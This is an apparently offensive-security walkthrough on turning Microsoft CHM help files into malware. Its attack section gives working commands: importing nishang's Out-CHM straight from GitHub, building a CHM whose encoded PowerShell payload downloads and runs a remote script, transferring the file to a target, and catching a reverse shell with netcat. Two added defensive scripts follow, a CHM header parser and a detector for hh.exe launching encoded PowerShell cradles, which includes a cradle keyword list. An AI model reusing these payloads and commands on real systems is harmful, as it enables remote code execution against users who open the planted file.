PRIMARY CATEGORY - FILE MANIPULATION
CHM - Microsoft Compiled HTML Help Files
This type of file is often used for software documentation, training guides and electronic newsletters.
It is a collection of HTML pages, images and other multimedia resources.
These files are compressed and deployed in a single binary container.
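Because a CHM is a binary container rather than loose HTML, file triage should identify it by its signature and not by the .chm extension. The following parser is an added example written for this page, not code from the page or from any CHM tooling: it reads the fixed ITSF header (field layout per the publicly documented CHM format: "ITSF" magic, version, header length, timestamp, language ID, two GUIDs and the header section table), checks that every offset stays inside the file, and builds a constructed minimal header to exercise itself. The section lengths used in the sample are assumed values for the test file only.

```python
import struct
import uuid

ITSF_MAGIC = b"ITSF"
# GUIDs recorded at header offsets 0x18 and 0x28 of a CHM, per the public CHM format notes.
DIRECTORY_GUID = uuid.UUID("7C01FD10-7BAA-11D0-9E0C-00A0C922E6EC")
STREAM_GUID = uuid.UUID("7C01FD11-7BAA-11D0-9E0C-00A0C922E6EC")


def is_chm(data: bytes) -> bool:
    """Identify a CHM by its ITSF signature rather than by the .chm extension."""
    return data[:4] == ITSF_MAGIC


def parse_itsf_header(data: bytes) -> dict:
    """Parse the fixed ITSF header and verify that its offsets stay inside the file."""
    if len(data) < 0x58 or not is_chm(data):
        raise ValueError("not an ITSF (CHM) file")
    version, header_len, _unknown, timestamp, lang_id = struct.unpack_from("<IIIII", data, 4)
    if header_len > len(data):
        raise ValueError(f"header length {header_len:#x} exceeds file size {len(data):#x}")
    dir_guid = uuid.UUID(bytes_le=data[0x18:0x28])
    stream_guid = uuid.UUID(bytes_le=data[0x28:0x38])
    sec0_off, sec0_len, sec1_off, sec1_len = struct.unpack_from("<QQQQ", data, 0x38)
    for off, length in ((sec0_off, sec0_len), (sec1_off, sec1_len)):
        if off + length > len(data):
            raise ValueError("header section table points outside the file")
    content_off = None
    if version >= 3 and len(data) >= 0x60:
        content_off = struct.unpack_from("<Q", data, 0x58)[0]  # version 3 only
    return {
        "version": version,
        "header_length": header_len,
        "timestamp": timestamp,
        "language_id": lang_id,
        "known_guids": (dir_guid, stream_guid) == (DIRECTORY_GUID, STREAM_GUID),
        "section0": (sec0_off, sec0_len),
        "section1": (sec1_off, sec1_len),
        "content_offset": content_off,
    }


def build_sample_chm_header(version: int = 3, lang_id: int = 0x409) -> bytes:
    """Constructed minimal file: a valid ITSF header followed by zero-filled sections.
    It is a test fixture for the parser, not a real CHM (assumed section sizes)."""
    header_len = 0x60
    sec0_off, sec0_len = header_len, 0x18           # file-size section
    sec1_off, sec1_len = sec0_off + sec0_len, 0x54  # directory-listing section
    content_off = sec1_off + sec1_len
    hdr = bytearray(ITSF_MAGIC)
    hdr += struct.pack("<IIIII", version, header_len, 1, 0, lang_id)
    hdr += DIRECTORY_GUID.bytes_le + STREAM_GUID.bytes_le
    hdr += struct.pack("<QQQQ", sec0_off, sec0_len, sec1_off, sec1_len)
    hdr += struct.pack("<Q", content_off)
    return bytes(hdr) + b"\0" * (content_off - header_len + 16)


if __name__ == "__main__":
    print(parse_itsf_header(build_sample_chm_header()))
```

Run the parser over every file in a directory users are known to browse (for example the directory described in this walkthrough) to list CHM containers regardless of how they are named; a file that fails the offset checks is malformed and worth a closer look on its own.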
Exploitation
A malicious .CHM file can be crafted and deployed to execute arbitrary code once opened by anyone
Therefore, let's suppose that there is a user on the target who is manually reviewing a certain directory, looking for any valid CHM files to open and inspect their content.
Payload Creation - CHM File
We can use Out-CHM to create a malicious CHM file which runs arbitrary code once opened, and leave it inside the mentioned directory.
From the Attacker
Download and Import the PowerShell Script
IEX (Invoke-RestMethod -UseBasicParsing -Uri 'https://github.com/samratashok/nishang/raw/refs/heads/master/Client/Out-CHM.ps1')
Malicious CHM Creation
The created CHM file will run the following payload, encoded as UTF-16LE base64 so it can be passed to -EncodedCommand:
echo -n "IEX (IWR -UseBasicParsing -Uri http://<IP_ADDRESS>:<PORT>/rev.ps1)" | iconv --to-code UTF-16LE | base64 -w 0 ; echo
- CHM File
Out-CHM -Payload "powershell.exe -EncodedCommand SQBFAFgAIAAoAEkAVwBSACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADMAMAA6ADgAOAA4ADgALwByAGUAdgAuAHAAcwAxACkA" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Payload Transfer
From the Attacker
python3 -m http.server <PORT>
From the Target
(New-Object Net.WebClient).DownloadFile('http://<ATTACKER_IP>:<PORT>/<CHM_FILE>', 'C:\ProgramData\<CHM_FILE>')
CHM Execution
Once the malicious CHM file is stored in the directory checked by the system user, just wait for the user to open this file and get command execution.
In this case, a reverse shell.
From the Attacker
rlwrap -CaR nc -nlvp <PORT>
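From the defender's side, the execution step above has a clear signature: the HTML Help viewer (hh.exe) launching PowerShell with an -EncodedCommand argument that decodes to a download-and-execute cradle. The script below is an added example written for this page, not code from the page or from any product: it scans process-creation events, decodes the UTF-16LE base64 argument (the reverse of the iconv/base64 step shown above) and reports both the parent/child relationship and the cradle vocabulary. The events are constructed inline in a Sysmon Event ID 1 style (field names assumed), and 192.0.2.10 is a documentation address, not a real host.

```python
import base64
import re

# Process names a help viewer has no business launching; assumed list for this example.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                       "wscript.exe", "cscript.exe", "rundll32.exe"}
# Download-and-execute cradle vocabulary, matched in the plain or decoded command line.
CRADLE = re.compile(r"\b(IEX|Invoke-Expression|IWR|Invoke-WebRequest|DownloadString|"
                    r"DownloadFile|Net\.WebClient)\b", re.IGNORECASE)
# -EncodedCommand and the abbreviations PowerShell accepts, followed by the base64 argument.
ENCODED = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell(command: str) -> str:
    """Same transformation as `iconv --to-code UTF-16LE | base64`; used only to build sample data."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    """Reverse the encoding so the real command text can be inspected and logged."""
    return base64.b64decode(encoded).decode("utf-16-le")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze_event(event: dict) -> dict:
    """Return the reasons an event is suspicious (empty list = no finding) and any decoded command."""
    parent, child = _basename(event["ParentImage"]), _basename(event["Image"])
    cmdline = event["CommandLine"]
    reasons, decoded = [], None
    if parent == "hh.exe" and child in SUSPICIOUS_CHILDREN:
        reasons.append(f"hh.exe spawned {child}")
    match = ENCODED.search(cmdline)
    if match:
        try:
            decoded = decode_powershell(match.group(1))
        except (ValueError, UnicodeDecodeError):
            reasons.append("undecodable -EncodedCommand argument")
    text = decoded if decoded is not None else cmdline
    if CRADLE.search(text):
        reasons.append("download/execute cradle: " + text.strip())
    return {"reasons": reasons, "decoded_command": decoded}


def find_chm_spawned_code(events: list) -> list:
    """Filter a batch of process-creation events down to those with at least one finding."""
    findings = []
    for event in events:
        result = analyze_event(event)
        if result["reasons"]:
            findings.append((event, result))
    return findings


# Constructed sample events (Sysmon Event ID 1 style field names assumed); not real logs.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\hh.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -EncodedCommand "
                    + encode_powershell("IEX (IWR -UseBasicParsing -Uri http://192.0.2.10:8080/rev.ps1)")},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\hh.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\ProgramData\manual.chm'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Process"},
]

if __name__ == "__main__":
    for event, result in find_chm_spawned_code(SAMPLE_EVENTS):
        print(event["CommandLine"][:60], "->", "; ".join(result["reasons"]))
```

Only the first sample event is reported: a user opening a CHM (explorer.exe launching hh.exe) is normal and stays silent, and so does ordinary PowerShell use. The decoded command is returned alongside the reasons so an alert can show the actual download URL instead of an opaque base64 blob.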